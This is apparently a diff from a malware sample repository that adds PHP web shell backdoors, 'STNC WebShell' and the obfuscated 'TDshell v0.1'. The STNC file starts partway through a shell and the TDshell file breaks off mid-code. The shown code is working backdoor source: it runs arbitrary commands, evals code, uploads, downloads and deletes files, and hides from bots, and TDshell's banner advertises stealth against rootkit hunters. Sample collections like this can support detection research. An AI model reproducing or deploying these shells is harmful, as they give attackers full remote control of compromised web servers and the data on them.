your ip: ".$_SERVER["REMOTE_ADDR"]." - server ip: ".gethostbyname($_SERVER["HTTP_HOST"])." - safe_mode: ".((safe_mode_is_on()) ? "on" : "off")."
".hidden("action","save").hidden_pwd()."".(($action_edit) ? "
".button(" Save ").hidden("fname",$fname):"")."
".hidden("action","cmd")."
Command: ".edit(85,"cmd","")."
Location: ".edit(85,"pwd",$location)." ".button("Execute")."
".hidden("action","edit").hidden_pwd()."
Edit file:".edit(85,"fname",$location)."".button(" Edit ")."
". + hidden("action","download").hidden_pwd()."
File:".edit(50,"fname",$location)."".button("Download")."
+
". + hidden("action","upload").hidden_pwd()."
File:
To file:".edit(50,"fname",$location)." ".button("Upload")."
+
".hidden("action","eval").hidden_pwd()."

".button(" Eval ")."
Coded by drmist | http://drmist.ru | http://www.security-teams.net | not enough functions? | (c) 2006 [STNC]
"; +?> \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Stnc.b b/PHP/Backdoor.PHP.Stnc.b new file mode 100644 index 00000000..d622c708 --- /dev/null +++ b/PHP/Backdoor.PHP.Stnc.b @@ -0,0 +1,168 @@ +$v) +{ $_POST[$k] = stripslashes($v); } + +/* +$login='root'; +$hash='b1b3773a05c0ed0176787a4f1574ff0075f7521e'; // sha1("qwerty") + +if(!(($_SERVER["PHP_AUTH_USER"]===$login)&&(sha1($_SERVER["PHP_AUTH_PW"])===$hash))) +{ +header("HTTP/1.0 401 Unauthorized"); +header("WWW-Authenticate: Basic"); +die(); +} +*/ + +function fe($s) +{return function_exists($s);} +function cmd($s) +{if(fe("exec")){exec($s,$r);$r=join("\n",$r);} +elseif(fe("shell_exec"))$r=shell_exec($s); +elseif(fe("system")){ob_start();system($s);$r=ob_get_contents();ob_end_clean();} +elseif(fe("passthru")){ob_start();passthru($s);$r=ob_get_contents();ob_end_clean();} +elseif(is_resource($f=popen($s,"r"))){$r="";while(!feof($f))$r.=fread($f,512);pclose($f);} +else $r=`$s`;return $r;} +function safe_mode_is_on() +{return ini_get('safe_mode');} +function str100($s) +{if(strlen($s)>100) $s=substr($s,0,100)."..."; return $s;} +function id() +{return str100(cmd("id"));} +function uname() +{return str100(cmd("uname -a"));} + +function edit($size, $name, $val) +{ return ""; } +function button($capt) +{ return ""; } +function hidden($name, $val) +{ return ""; } +function hidden_pwd() +{ global $location; return hidden("pwd",$location);} + +$action_edit = false; + +$printline = ""; + +if(isset($_POST["action"])) $action = $_POST["action"]; +else $action = "cmd"; + +if(isset($_POST["pwd"])) +{ $pwd = $_POST["pwd"]; $type = filetype($pwd); if($type === "dir")chdir($pwd); else $printline = "\"$pwd\" - no such directory."; } + +$location = getcwd(); + +if(($action === "download")&&(isset($_POST["fname"]))) +{ + $fname = $_POST["fname"]; + if(file_exists($fname)) + { + $pathinfo = pathinfo($fname); + header("Content-Transfer-Encoding: binary"); + header("Content-type: application/x-download"); + header("Content-Length: ".filesize($fname)); + header("Content-Disposition: attachment; filename=".$pathinfo["basename"]); + readfile($fname); + die(); + } + else + $printline = "\"$fname\" - download failed."; +} + +echo " STNC WebShell v$version + + + + + + + + +
  STNC WebShell v$version  id: ".id()."
uname: ".uname()."
your ip: ".$_SERVER["REMOTE_ADDR"]." - server ip: ".gethostbyname($_SERVER["HTTP_HOST"])." - safe_mode: ".((safe_mode_is_on()) ? "on" : "off")."
".hidden("action","save").hidden_pwd()."".(($action_edit) ? "
".button(" Save ").hidden("fname",$fname):"")."
".hidden("action","cmd")."
Command: ".edit(85,"cmd","")."
Location: ".edit(85,"pwd",$location)." ".button("Execute")."
".hidden("action","edit").hidden_pwd()."
Edit file:".edit(85,"fname",$location)."".button(" Edit ")."
". + hidden("action","download").hidden_pwd()."
File:".edit(50,"fname",$location)."".button("Download")."
+
". + hidden("action","upload").hidden_pwd()."
File:
To file:".edit(50,"fname",$location)." ".button("Upload")."
+
".hidden("action","eval").hidden_pwd()."

".button(" Eval ")."
Coded by drmist | http://drmist.ru | http://www.security-teams.net | not enough functions? | (c) 2006 [STNC]
"; +?> \ No newline at end of file diff --git a/PHP/Backdoor.PHP.TDshell.a b/PHP/Backdoor.PHP.TDshell.a new file mode 100644 index 00000000..0ecc6e24 --- /dev/null +++ b/PHP/Backdoor.PHP.TDshell.a @@ -0,0 +1,1840 @@ +/** + _______ _ _____ __ _ + |__ __| | | __ \ / _| | | + | | | |__ ___| | | | ___| |_ __ _ ___ ___ __| | + | | | '_ \ / _ \ | | |/ _ \ _/ _` |/ __/ _ \/ _` | + | | | | | | __/ |__| | __/ || (_| | (_| __/ (_| | + |_| |_| |_|\___|_____/ \___|_| \__,_|\___\___|\__,_| + + _____ _ _ _______ + / ____| (_) | |__ __| +| (___ ___ ___ _ _ _ __ _| |_ _ _ | | ___ __ _ _ __ ___ + \___ \ / _ \/ __| | | | '__| | __| | | | | |/ _ \/ _` | '_ ` _ \ + ____) | __/ (__| |_| | | | | |_| |_| | | | __/ (_| | | | | | | +|_____/ \___|\___|\__,_|_| |_|\__|\__, | |_|\___|\__,_|_| |_| |_| + __/ | + |___/ + __________________________________________________________________ + |------------------------[ TDshell v0.1 ]------------------------| + | [ © 2005 -> 2008 TheDefaced Security Team ] | +/------------------------------------------------------------------\ +\ / + \ ___________________ .__ .__ .__ / + \ \__ ___/\______ \ _____| |__ ____ | | | | / + \ | | | | \ / ___/ | \_/ __ \| | | | / + / | | | ` \\___ \| Y \ ___/| |_| |__ \ + / |____| /_______ /____ >___| /\___ >____/____/ \ + \ \/ \/ \/ \/ / + \____________________________________________________________/ + | | + |------------------------[ CREDITS ]------------------------| + | | + | www.TheDefaced.org | + | * DeadlyData | + | * Debug | + | * Kr3w | + | * Tr3mbl3r | + | * xaNax` | + | * Blood420 | + \ / + |#######################################################| + / \ + | | + |-----------------------[ FEATURES! ]-----------------------| + | | + | TDshell contains a lot of features. Mainly, TDshell was | + | developed to alleviate what other shells left behind. | + | Other shells can brag the ability to do this and that, | + | but in the end what makes a shell, a shell? We think a | + | shell should have stealth. It should be fast to load, use | + | little memory, avoid logging from rootkit hunters, be | + | modern, and simply do exactly what you want it to do. The | + | style must be simple. It should allow for the execution | + | of your commands, the implimentation of every feature | + | necessary with sleek control and seemless ability. Not | + | only does TDshell aim to be the most stealthiest, but the | + | most powerful all-around shell ever created. | + \ / + |#######################################################| + / \ + |------------------------[ HISTORY ]------------------------| + | | + | TDshell was created to impliment the look and feel that a | + | shell should have, the features and speed that a shell | + | should have, and the endless limits of post-development | + | for everyone. | + | | + | The core of TDshell is a strong shell processing system. | + | Yes, TDshell has object oriented elements, whether you | + | like it or not. It is extensive enough to have to include | + | a system as such. The object oriented system within | + | does not include OOP Class Constructs and Features that | + | are not available with PHP 4. This is due to the fact | + | that many new features to OOP in PHP 5 were added, and to | + | limit the version requirements of this shell such | + | features have not been implimented. | + | | + | TDshell will not log any activity using the shell. No | + | information regarding this shell location, queries, or | + | executions of code will be logged to another server. | + \ / + |#######################################################| + / \ + |---------------------[ DOCUMENTATION ]---------------------| + | | + | Please review the documentation of TDshell at TheDefaced | + | TDshell Project Page on http://tdshell.thedefaced.org. | + \ / + |#######################################################| + / \ + /___________________________________________________________\ + +**/ + +if (substr_count(strtolower($_SERVER['HTTP_USER_AGENT']), "bot")) + { + @header("Location: http://thedefaced.org/"); + exit; + }; + +function current_URI() + { + $_42a6152a4d7c7d957669c6d70dc5ba87 = 'http'; + if ($_SERVER["HTTPS"] == "on") + { + $_42a6152a4d7c7d957669c6d70dc5ba87 .= "s"; + }; + $_42a6152a4d7c7d957669c6d70dc5ba87 .= "://"; + if ($_SERVER["SERVER_PORT"] != "80") + { + $_42a6152a4d7c7d957669c6d70dc5ba87 .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["SCRIPT_NAME"]; + } + else + { + $_42a6152a4d7c7d957669c6d70dc5ba87 .= $_SERVER["SERVER_NAME"].$_SERVER["SCRIPT_NAME"]; + }; + return $_42a6152a4d7c7d957669c6d70dc5ba87; + }; + + +function natsort2d(&$_6f3f41fdac2563c0cd2246cb5a507861) { + $_8b950f1de0291b3d751c9073c331b045 = $_3abe5e58427863cb52d841b2e474b99d = array(); + foreach ($_6f3f41fdac2563c0cd2246cb5a507861 as $_4377314b1cecdbac9a384c43c42c6b48=>$_d52f547da0e098832b6b81469d36c48b) { + reset($_d52f547da0e098832b6b81469d36c48b); + $_8b950f1de0291b3d751c9073c331b045[$_4377314b1cecdbac9a384c43c42c6b48]=current($_d52f547da0e098832b6b81469d36c48b); + } + natsort($_8b950f1de0291b3d751c9073c331b045); + foreach ($_8b950f1de0291b3d751c9073c331b045 as $_4377314b1cecdbac9a384c43c42c6b48=>$_d52f547da0e098832b6b81469d36c48b) { + $_3abe5e58427863cb52d841b2e474b99d[$_4377314b1cecdbac9a384c43c42c6b48] = $_6f3f41fdac2563c0cd2246cb5a507861[$_4377314b1cecdbac9a384c43c42c6b48]; + } + $_6f3f41fdac2563c0cd2246cb5a507861 = $_3abe5e58427863cb52d841b2e474b99d; +} + +function getmicrotime() + { + $_f1aa244866e1fc41fe62f3b7ccb03607 = split(" ",microtime()); + $_1392ef521657c311e39af249669c5c4c = $_f1aa244866e1fc41fe62f3b7ccb03607[0] + $_f1aa244866e1fc41fe62f3b7ccb03607[1]; + return $_1392ef521657c311e39af249669c5c4c; + }; + +function view_size($_d01b1d6ca02250dd3186b3eb5feeca75) + { + if (!is_numeric($_d01b1d6ca02250dd3186b3eb5feeca75)) {return FALSE;} + else + { + if ($_d01b1d6ca02250dd3186b3eb5feeca75 >= 1073741824) {$_d01b1d6ca02250dd3186b3eb5feeca75 = round($_d01b1d6ca02250dd3186b3eb5feeca75/1073741824*100)/100 ." GB";} + elseif ($_d01b1d6ca02250dd3186b3eb5feeca75 >= 1048576) {$_d01b1d6ca02250dd3186b3eb5feeca75 = round($_d01b1d6ca02250dd3186b3eb5feeca75/1048576*100)/100 ." MB";} + elseif ($_d01b1d6ca02250dd3186b3eb5feeca75 >= 1024) {$_d01b1d6ca02250dd3186b3eb5feeca75 = round($_d01b1d6ca02250dd3186b3eb5feeca75/1024*100)/100 ." KB";} + else {$_d01b1d6ca02250dd3186b3eb5feeca75 = $_d01b1d6ca02250dd3186b3eb5feeca75 . " B";} + return $_d01b1d6ca02250dd3186b3eb5feeca75; + } + }; +if ( !function_exists('htmlspecialchars_decode') ) + { + function htmlspecialchars_decode($_33343500153dd2bfdb71207b3a2efb0b) + { + return strtr($_33343500153dd2bfdb71207b3a2efb0b, array_flip(get_html_translation_table(HTML_SPECIALCHARS))); + }; + }; + +function processdir($_2211b5dc6bb7947adcb0bf14cee6591e) + { + $_2211b5dc6bb7947adcb0bf14cee6591e = @realpath($_2211b5dc6bb7947adcb0bf14cee6591e); + $_2211b5dc6bb7947adcb0bf14cee6591e = @explode(DIRECTORY_SEPARATOR, $_2211b5dc6bb7947adcb0bf14cee6591e); + $_2211b5dc6bb7947adcb0bf14cee6591e = @array_reverse($_2211b5dc6bb7947adcb0bf14cee6591e); + foreach ($_2211b5dc6bb7947adcb0bf14cee6591e as $_120c29d6a17d23d38cf83c73ee28474a => $_dbb9cf7861c2b08674858b1c5ed255d3) + { + $_4015b8ddbb3792b7cea9b691c444f9bb = @implode(DIRECTORY_SEPARATOR, @array_reverse($_2211b5dc6bb7947adcb0bf14cee6591e)); + $_a9e5405d6581811dbff46e9ca3280bc1[] = $GLOBALS['TDshell']->make_link("list", array("dir" => $_4015b8ddbb3792b7cea9b691c444f9bb . DIRECTORY_SEPARATOR), @htmlspecialchars($_dbb9cf7861c2b08674858b1c5ed255d3) . DIRECTORY_SEPARATOR); + unset($_2211b5dc6bb7947adcb0bf14cee6591e[$_120c29d6a17d23d38cf83c73ee28474a]); + }; + $_a9e5405d6581811dbff46e9ca3280bc1 = @array_reverse($_a9e5405d6581811dbff46e9ca3280bc1); + $_a9e5405d6581811dbff46e9ca3280bc1 = @implode("", $_a9e5405d6581811dbff46e9ca3280bc1); + return $_a9e5405d6581811dbff46e9ca3280bc1; + }; +if (!@function_exists("htmlspecialchars_decode")) { + function htmlspecialchars_decode($_5fa3317a9a640ed74c5f9247474ed574, $_59588925eec423f30d40b21b1ed1668e = ENT_COMPAT) { + return strtr($_5fa3317a9a640ed74c5f9247474ed574, array_flip(get_html_translation_table(HTML_SPECIALCHARS, $_59588925eec423f30d40b21b1ed1668e))); + }; +}; + +function delete_directory($_03bc224b8d2f7aeadafb2048d91c8f5e) { + $_82c6138b62efd9e0b5bd91204b1d854b = @opendir($_03bc224b8d2f7aeadafb2048d91c8f5e); + while(($_3de8e09f12e75d6214bb6e7720875bf2 = @readdir($_82c6138b62efd9e0b5bd91204b1d854b)) !== FALSE) { + if ($_3de8e09f12e75d6214bb6e7720875bf2 != "." && $_3de8e09f12e75d6214bb6e7720875bf2 != "..") { + if (!@is_dir($_03bc224b8d2f7aeadafb2048d91c8f5e."/".$_3de8e09f12e75d6214bb6e7720875bf2)) + @unlink($_03bc224b8d2f7aeadafb2048d91c8f5e."/".$_3de8e09f12e75d6214bb6e7720875bf2); + else + delete_directory($_03bc224b8d2f7aeadafb2048d91c8f5e.'/'.$_3de8e09f12e75d6214bb6e7720875bf2); + } + } + @closedir($_82c6138b62efd9e0b5bd91204b1d854b); + if (@rmdir($_03bc224b8d2f7aeadafb2048d91c8f5e)) + { + return true; + }; + return false; +}; + +function is_disabled($_d24fdc60af9ffefb892a8c20a6f28f0f) { + $_3f595d48284da121e82e9fba50f8ae78=@explode(',',@ini_get('disable_functions')); + return @in_array($_d24fdc60af9ffefb892a8c20a6f28f0f, $_3f595d48284da121e82e9fba50f8ae78); +} + +function custom_exec($_43b464f69048e498f740f7449de30b58) + { + if (!is_disabled("exec")) + { + @exec($_43b464f69048e498f740f7449de30b58, $_c378b53352ff491652530ac000f8d120); + return @implode("\n", $_c378b53352ff491652530ac000f8d120); + } + elseif (!is_disabled("system")) + { + @ob_start(); + @system($_43b464f69048e498f740f7449de30b58); + $_a9e5405d6581811dbff46e9ca3280bc1 = @ob_get_clean(); + return $_a9e5405d6581811dbff46e9ca3280bc1; + } + elseif (!is_disabled("passthru")) + { + @ob_start(); + @passthru($_43b464f69048e498f740f7449de30b58); + $_a9e5405d6581811dbff46e9ca3280bc1 = @ob_get_clean(); + return $_a9e5405d6581811dbff46e9ca3280bc1; + } + else + { + return FALSE; + } + } + +function listDir($_2211b5dc6bb7947adcb0bf14cee6591e) + { + $_7924ccf53d944b2d8320d10d54548e29 = array(); + $_ae816068878d4783e70eeef9284475f4 = array(); + $_fd614daccd49afd7833e083628860ad5 = array(); + + $_c14f19c15d50e72a5733c0ad88a035b9 = @opendir($_2211b5dc6bb7947adcb0bf14cee6591e); + while (($_b6525f529051ff28fa112494d8e2d5a3 = @readdir($_c14f19c15d50e72a5733c0ad88a035b9)) !== FALSE) + { + $_d69e2bdf98584fc6cce9c9f9a9eb8b6a[] = $_b6525f529051ff28fa112494d8e2d5a3; + }; + @closedir($_c14f19c15d50e72a5733c0ad88a035b9); + foreach ($_d69e2bdf98584fc6cce9c9f9a9eb8b6a as $_e702a6d41125002051486e5e72b66d74) + { + if ($_e702a6d41125002051486e5e72b66d74 == ".") + { + $_ae816068878d4783e70eeef9284475f4[] = $_2211b5dc6bb7947adcb0bf14cee6591e . "." . DIRECTORY_SEPARATOR; + } + elseif ($_e702a6d41125002051486e5e72b66d74 == "..") + { + $_ae816068878d4783e70eeef9284475f4[] = $_2211b5dc6bb7947adcb0bf14cee6591e . ".." . DIRECTORY_SEPARATOR; + } + elseif (@is_dir($_2211b5dc6bb7947adcb0bf14cee6591e . $_e702a6d41125002051486e5e72b66d74)) + { + if (@is_link($_e702a6d41125002051486e5e72b66d74)) + { + $_ae816068878d4783e70eeef9284475f4[] = $_2211b5dc6bb7947adcb0bf14cee6591e . $_e702a6d41125002051486e5e72b66d74 . DIRECTORY_SEPARATOR; + } + else + { + $_fd614daccd49afd7833e083628860ad5[] = $_2211b5dc6bb7947adcb0bf14cee6591e . $_e702a6d41125002051486e5e72b66d74 . DIRECTORY_SEPARATOR; + }; + } + elseif (@is_file($_2211b5dc6bb7947adcb0bf14cee6591e . $_e702a6d41125002051486e5e72b66d74)) + { + $_7924ccf53d944b2d8320d10d54548e29[] = $_2211b5dc6bb7947adcb0bf14cee6591e . $_e702a6d41125002051486e5e72b66d74; + } + else + { + $_ae816068878d4783e70eeef9284475f4[] = $_2211b5dc6bb7947adcb0bf14cee6591e . $_e702a6d41125002051486e5e72b66d74; + }; + }; + foreach ($_7924ccf53d944b2d8320d10d54548e29 as $_4377314b1cecdbac9a384c43c42c6b48 => $_3de8e09f12e75d6214bb6e7720875bf2) + { + $_86cc5dffb9c95119ecd61c5ce2502cbc[@htmlspecialchars(@basename($_3de8e09f12e75d6214bb6e7720875bf2))] = @realpath($_3de8e09f12e75d6214bb6e7720875bf2); + }; + foreach ($_fd614daccd49afd7833e083628860ad5 as $_4377314b1cecdbac9a384c43c42c6b48 => $_2211b5dc6bb7947adcb0bf14cee6591e) + { + $_929bdda99ead5652737dc2edefe9b0c4[@htmlspecialchars(@basename($_2211b5dc6bb7947adcb0bf14cee6591e))] = @realpath($_2211b5dc6bb7947adcb0bf14cee6591e); + }; + foreach ($_ae816068878d4783e70eeef9284475f4 as $_4377314b1cecdbac9a384c43c42c6b48 => $_74bd500a4b44ea6a823f6199ccdb62a8) + { + $_022d200e9529826ec8ed110a68478d28[@htmlspecialchars(@basename($_74bd500a4b44ea6a823f6199ccdb62a8))] = @realpath($_74bd500a4b44ea6a823f6199ccdb62a8); + }; + @natsort($_86cc5dffb9c95119ecd61c5ce2502cbc); + @natsort($_929bdda99ead5652737dc2edefe9b0c4); + @natsort($_022d200e9529826ec8ed110a68478d28); + return array("FILES" => $_86cc5dffb9c95119ecd61c5ce2502cbc, "DIRS" => $_929bdda99ead5652737dc2edefe9b0c4, "LINKS" => $_022d200e9529826ec8ed110a68478d28); + } + +function recursiveDirectoryResponse($_2211b5dc6bb7947adcb0bf14cee6591e) + { + $_2211b5dc6bb7947adcb0bf14cee6591e = @realpath($_2211b5dc6bb7947adcb0bf14cee6591e); + if (!@is_dir($_2211b5dc6bb7947adcb0bf14cee6591e)) + { + return FALSE; + }; + $_c14f19c15d50e72a5733c0ad88a035b9 = @opendir($_2211b5dc6bb7947adcb0bf14cee6591e); + $_35822b5d3e252c2cd76a8cfd0bc9215b = array(); + while (($_b6525f529051ff28fa112494d8e2d5a3 = @readdir($_c14f19c15d50e72a5733c0ad88a035b9)) !== FALSE) + { + if ($_b6525f529051ff28fa112494d8e2d5a3 !== "." && $_b6525f529051ff28fa112494d8e2d5a3 !== "..") + { + if (@is_dir($_b6525f529051ff28fa112494d8e2d5a3) && !isset($_35822b5d3e252c2cd76a8cfd0bc9215b[$_b6525f529051ff28fa112494d8e2d5a3 . DIRECTORY_SEPARATOR])) + { + $_35822b5d3e252c2cd76a8cfd0bc9215b[$_b6525f529051ff28fa112494d8e2d5a3 . DIRECTORY_SEPARATOR] = recursiveDirectoryResponse($_b6525f529051ff28fa112494d8e2d5a3); + } + else + { + $_35822b5d3e252c2cd76a8cfd0bc9215b[] = $_b6525f529051ff28fa112494d8e2d5a3; + }; + }; + }; + return $_35822b5d3e252c2cd76a8cfd0bc9215b; + } + +function file_perms($_3de8e09f12e75d6214bb6e7720875bf2, $_7c6634f9e5e8cd23040778e99232dff3 = false) +{ + if(!@file_exists($_3de8e09f12e75d6214bb6e7720875bf2)) return false; + + $_13f531c0ca48f6a5f8315121bf59ffaa = @fileperms($_3de8e09f12e75d6214bb6e7720875bf2); + + $_cbc4b619c09cd3060d1699bd1b6ec197 = $_7c6634f9e5e8cd23040778e99232dff3 ? 2 : 3; + + return @substr(@decoct($_13f531c0ca48f6a5f8315121bf59ffaa), $_cbc4b619c09cd3060d1699bd1b6ec197); +} + +function view_perms($_65fa4fdb4dc96ba9c4f2629446b1acf9) +{ + if (($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 0xC000) === 0xC000) {$_78f05392f016a05e28dc87c1d3bd52a2 = "s";} + elseif (($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 0x4000) === 0x4000) {$_78f05392f016a05e28dc87c1d3bd52a2 = "d";} + elseif (($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 0xA000) === 0xA000) {$_78f05392f016a05e28dc87c1d3bd52a2 = "l";} + elseif (($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 0x8000) === 0x8000) {$_78f05392f016a05e28dc87c1d3bd52a2 = "-";} + elseif (($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 0x6000) === 0x6000) {$_78f05392f016a05e28dc87c1d3bd52a2 = "b";} + elseif (($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 0x2000) === 0x2000) {$_78f05392f016a05e28dc87c1d3bd52a2 = "c";} + elseif (($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 0x1000) === 0x1000) {$_78f05392f016a05e28dc87c1d3bd52a2 = "p";} + else {$_78f05392f016a05e28dc87c1d3bd52a2 = "?";} + $_08a8bc95aa954433522d6e8773049cbc["read"] = ($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 00400)?"r":"-"; + $_08a8bc95aa954433522d6e8773049cbc["write"] = ($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 00200)?"w":"-"; + $_08a8bc95aa954433522d6e8773049cbc["execute"] = ($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 00100)?"x":"-"; + $_aeaf1179391a94c353c7eb37a0e3ec8b["read"] = ($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 00040)?"r":"-"; + $_aeaf1179391a94c353c7eb37a0e3ec8b["write"] = ($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 00020)?"w":"-"; + $_aeaf1179391a94c353c7eb37a0e3ec8b["execute"] = ($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 00010)?"x":"-"; + $_be187a6755c5e72374d46fcbc1c4fe57["read"] = ($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 00004)?"r":"-"; + $_be187a6755c5e72374d46fcbc1c4fe57["write"] = ($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 00002)? "w":"-"; + $_be187a6755c5e72374d46fcbc1c4fe57["execute"] = ($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 00001)?"x":"-"; + if ($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 0x800) {$_08a8bc95aa954433522d6e8773049cbc["execute"] = ($_08a8bc95aa954433522d6e8773049cbc["execute"] == "x")?"s":"S";} + if ($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 0x400) {$_aeaf1179391a94c353c7eb37a0e3ec8b["execute"] = ($_aeaf1179391a94c353c7eb37a0e3ec8b["execute"] == "x")?"s":"S";} + if ($_65fa4fdb4dc96ba9c4f2629446b1acf9 & 0x200) {$_be187a6755c5e72374d46fcbc1c4fe57["execute"] = ($_be187a6755c5e72374d46fcbc1c4fe57["execute"] == "x")?"t":"T";} + return $_78f05392f016a05e28dc87c1d3bd52a2.join("",$_08a8bc95aa954433522d6e8773049cbc).join("",$_aeaf1179391a94c353c7eb37a0e3ec8b).join("",$_be187a6755c5e72374d46fcbc1c4fe57); +} + +function view_perms_color($_3bf3fbc5fc401a716348815f5e794920) +{ + if (!@is_readable($_3bf3fbc5fc401a716348815f5e794920)) {return "".view_perms(@fileperms($_3bf3fbc5fc401a716348815f5e794920))."";} + elseif (!@is_writable($_3bf3fbc5fc401a716348815f5e794920)) {return "".view_perms(@fileperms($_3bf3fbc5fc401a716348815f5e794920))."";} + else {return "".view_perms(@fileperms($_3bf3fbc5fc401a716348815f5e794920))."";} +} + +Class _463f641c8747ebe94fafef7333a99b45 + { + var $TDshell_version = "TDshell v0.1 - Beta"; + var $TDshell_template = array(); + var $TDshell_data = ""; + var $TDshell_time_start = ""; + var $TDshell_time_end = ""; + + function init() + { + $_a3ae37119660c8023a43787f58268912 = $_GET['proc']; + unset($_GET['proc']); + $_2e5c25529adea7d7ad4802936aee0b48 = $_GET['act']; + unset($_GET['act']); + $this->TDshell_time_start = getmicrotime(); + if ($_a3ae37119660c8023a43787f58268912 != "out") + { + $this->header(); + } + if (!empty($_GET['args'])) + { + $_ec4ae32bf3e3a09bae7ff3e84ebbc667 = $_GET['args']; + $_ec4ae32bf3e3a09bae7ff3e84ebbc667 = @explode("-", $_ec4ae32bf3e3a09bae7ff3e84ebbc667); + foreach ($_ec4ae32bf3e3a09bae7ff3e84ebbc667 as $_f16aff67f7495b01405d8cd6181766f0) + { + list($_d3befca3813d65aff84c2353e705a0dd, $_dd5a91d0c375489fc194ecfe1da2e38a) = @explode(":", @base64_decode($_f16aff67f7495b01405d8cd6181766f0), 2); + $_8cc898f326427ea2223c7150e5b6537c[$_d3befca3813d65aff84c2353e705a0dd] = $_dd5a91d0c375489fc194ecfe1da2e38a; + }; + $this->process($_2e5c25529adea7d7ad4802936aee0b48, $_8cc898f326427ea2223c7150e5b6537c); + } + else + { + $this->process($_2e5c25529adea7d7ad4802936aee0b48); + }; + $this->TDshell_time_end = getmicrotime(); + if ($_a3ae37119660c8023a43787f58268912 != "out") + { + $this->footer("" . $this->TDshell_time_end - $this->TDshell_time_start . ""); + } + $this->outall(); + } + + function process($_2e5c25529adea7d7ad4802936aee0b48 = "", $_ec4ae32bf3e3a09bae7ff3e84ebbc667 = array()) + { + switch($_2e5c25529adea7d7ad4802936aee0b48) + { + case "list": + $_2211b5dc6bb7947adcb0bf14cee6591e = $_ec4ae32bf3e3a09bae7ff3e84ebbc667['dir']; + if (empty($_2211b5dc6bb7947adcb0bf14cee6591e)) + { + $this->process("list", array("dir" => "." . DIRECTORY_SEPARATOR)); + return FALSE; + }; + + if (!@is_dir($_2211b5dc6bb7947adcb0bf14cee6591e)) + { + $this->out("Problem listing directory; directory does not exist or cannot be read from."); + return FALSE; + }; + $_8e1c807f3c845b208dba4430e64f4d94 = listDir($_2211b5dc6bb7947adcb0bf14cee6591e); + $this->out("" . processdir($_2211b5dc6bb7947adcb0bf14cee6591e) . "   " . view_perms_color($_2211b5dc6bb7947adcb0bf14cee6591e) . "
"); + $this->out("
Listing " . @count($_8e1c807f3c845b208dba4430e64f4d94['DIRS']) . " directories and " . @count($_8e1c807f3c845b208dba4430e64f4d94['FILES']) . " files.
"); + if (empty($_8e1c807f3c845b208dba4430e64f4d94['LINKS'])) + { + $this->out("Problem listing directory; directory does not exist or cannot be read from."); + return FALSE; + }; + $this->out(" + + + + + + + + "); + if (@is_array($_8e1c807f3c845b208dba4430e64f4d94['LINKS'])) + foreach ($_8e1c807f3c845b208dba4430e64f4d94['LINKS'] as $_a70fd9147fda16858f57fe0479d66df0 => $_bf765329c68fb45566ab3b1af145d2c2) + { + $this->out(""); + $this->out(""); + $this->out(""); + $_ca3b4c9ef3a45b7d6dc6af03bad1367b = @posix_getpwuid(@fileowner($_bf765329c68fb45566ab3b1af145d2c2)); + $_35b2f08320a2169a648d2377cae768d3 = @posix_getgrgid(@filegroup($_bf765329c68fb45566ab3b1af145d2c2)); + $_ca3b4c9ef3a45b7d6dc6af03bad1367b = $_ca3b4c9ef3a45b7d6dc6af03bad1367b["name"]; + $_35b2f08320a2169a648d2377cae768d3 = $_35b2f08320a2169a648d2377cae768d3["name"]; + $this->out(""); + $this->out(""); + $this->out(""); + $this->out(""); + $this->out(""); + } + if (@is_array($_8e1c807f3c845b208dba4430e64f4d94['DIRS'])) + foreach ($_8e1c807f3c845b208dba4430e64f4d94['DIRS'] as $_23e43c1054e39145ffd2c948f87f107c => $_b52f6a3170e004ef525cff1e536b7427) + { + $this->out(""); + $this->out(""); + $this->out(""); + $_a7fcd5fac3ae867f8cdb4eb46a683477 = @posix_getpwuid(@fileowner($_b52f6a3170e004ef525cff1e536b7427)); + $_82e66704cd450201cf5168d64d52a4d3 = @posix_getgrgid(@filegroup($_b52f6a3170e004ef525cff1e536b7427)); + $_a7fcd5fac3ae867f8cdb4eb46a683477 = $_a7fcd5fac3ae867f8cdb4eb46a683477["name"]; + $_82e66704cd450201cf5168d64d52a4d3 = $_82e66704cd450201cf5168d64d52a4d3["name"]; + $this->out(""); + $this->out(""); + $this->out(""); + $this->out(""); + $this->out(""); + } + if (@is_array($_8e1c807f3c845b208dba4430e64f4d94['FILES'])) + foreach ($_8e1c807f3c845b208dba4430e64f4d94['FILES'] as $_0136b647df83da4bb9a70b41420d9e05 => $_f3f7e9f4a6ad2cc07b147484d501377d) + { + $_ed02210e63e304003de8ccd669607668 = view_size(@filesize($_f3f7e9f4a6ad2cc07b147484d501377d)); + $_8501d6dd59b45b2159f1f73f6e17b11f = @md5(microtime() . $_0136b647df83da4bb9a70b41420d9e05); + $this->out(""); + $this->out(""); + $this->out(""); + $_d2f5e3cb12e93bae6c4981faf06db693 = @posix_getpwuid(@fileowner($_f3f7e9f4a6ad2cc07b147484d501377d)); + $_048403d36ad14f408d11cb9c81b09d29 = @posix_getgrgid(@filegroup($_f3f7e9f4a6ad2cc07b147484d501377d)); + $_d2f5e3cb12e93bae6c4981faf06db693 = $_d2f5e3cb12e93bae6c4981faf06db693["name"]; + $_048403d36ad14f408d11cb9c81b09d29 = $_048403d36ad14f408d11cb9c81b09d29["name"]; + $this->out(""); + $this->out(""); + $this->out(""); + $_55b73f20aeec06c5111b6ba95bf29532 = @md5_file($_f3f7e9f4a6ad2cc07b147484d501377d); + if (!@preg_match("/^[A-Fa-f0-9]{32}$/", $_55b73f20aeec06c5111b6ba95bf29532)) + { + $_55b73f20aeec06c5111b6ba95bf29532 = "Not Available"; + }; + $this->out(""); + $this->out(""); + } + $this->out("
+ Name + + Size + + Modified + + Owner|Group + + Permissions + + Action +
